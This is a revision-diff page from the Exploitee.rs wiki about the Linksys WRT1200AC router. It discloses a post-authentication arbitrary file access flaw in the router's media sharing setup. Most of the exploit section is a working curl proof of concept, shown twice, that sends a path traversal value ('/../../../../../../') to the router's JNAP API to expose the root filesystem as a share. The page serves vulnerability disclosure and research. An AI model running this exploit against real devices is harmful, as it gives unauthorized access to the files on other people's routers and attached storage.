Difference between revisions of "Linksys WRT1200AC"

From Exploitee.rs
Jump to navigationJump to search
 
Line 17: Line 17:


==POC==
==POC==
The following curl command is a Proof of Concept which demonstrates creating a file share at /.


* Firmware Version: 1.0.5.177401
Firmware Version: 1.0.5.177401
 
 
The following curl command is a Proof of Concept which demonstrates creating a file share at /.


<pre>curl -i -s -k  -X 'POST' \
<pre>curl -i -s -k  -X 'POST' \
Line 31: Line 28:
-b 'initial-tab=; visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter-values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2CwirelessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20<BASE64 CREDS>; current-applet=A2DB16C0-59B9-4C79-9BF2-E5A3A307F9C1' \
-b 'initial-tab=; visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter-values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2CwirelessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20<BASE64 CREDS>; current-applet=A2DB16C0-59B9-4C79-9BF2-E5A3A307F9C1' \
--data-binary $'{\"name\":\"HAXHAXHAX\",\"partitionName\":\"/dev/sda1\",\"path\":\"/../../../../../../\",\"isReadOnly\":false,\"groupsWithPermission\":[\"testuser\",\"admin\"]}' \
--data-binary $'{\"name\":\"HAXHAXHAX\",\"partitionName\":\"/dev/sda1\",\"path\":\"/../../../../../../\",\"isReadOnly\":false,\"groupsWithPermission\":[\"testuser\",\"admin\"]}' \
'http://192.168.1.1/JNAP/'<pre>
'http://192.168.1.1/JNAP/'</pre>
 
=== Demo ===
{{#ev:youtube|wwUB6R1rRTQ}}

Latest revision as of 12:27, 10 August 2017

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

LINKSYS WRT1200AC.JPG

Linksys WRT1200AC

Built on the foundation of our original WRT's open-source heritage, the Linksys WRT1200AC delivers superior network performance for the most demanding users. The WRT1200AC features two external antennas, a powerful 1.3GHz dual-core ARM, and Wireless-AC to provide high-speed Wi-Fi connections with exceptional range.

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Linksys WRT1200AC at Amazon

Post Authentication Arbitrary File Access

Arbitrary file access due to improper sanitization of path field in media sharing setup.

POC

The following curl command is a Proof of Concept which demonstrates creating a file share at /.

  • Firmware Version: 1.0.5.177401
curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json; charset=UTF-8' -H 'X-JNAP-Action: http://linksys.com/jnap/storage/CreateFTPFolder' \
-H 'Expires: Fri, 10 Oct 2013 14:19:41 GMT' -H 'X-JNAP-Authorization: Basic <BASE64 CREDS>' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: http://192.168.1.1/ui/1.0.99.177401/dynamic/home.html' \
-b 'initial-tab=; visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter-values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2CwirelessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20<BASE64 CREDS>; current-applet=A2DB16C0-59B9-4C79-9BF2-E5A3A307F9C1' \
--data-binary $'{\"name\":\"HAXHAXHAX\",\"partitionName\":\"/dev/sda1\",\"path\":\"/../../../../../../\",\"isReadOnly\":false,\"groupsWithPermission\":[\"testuser\",\"admin\"]}' \
'http://192.168.1.1/JNAP/'

Demo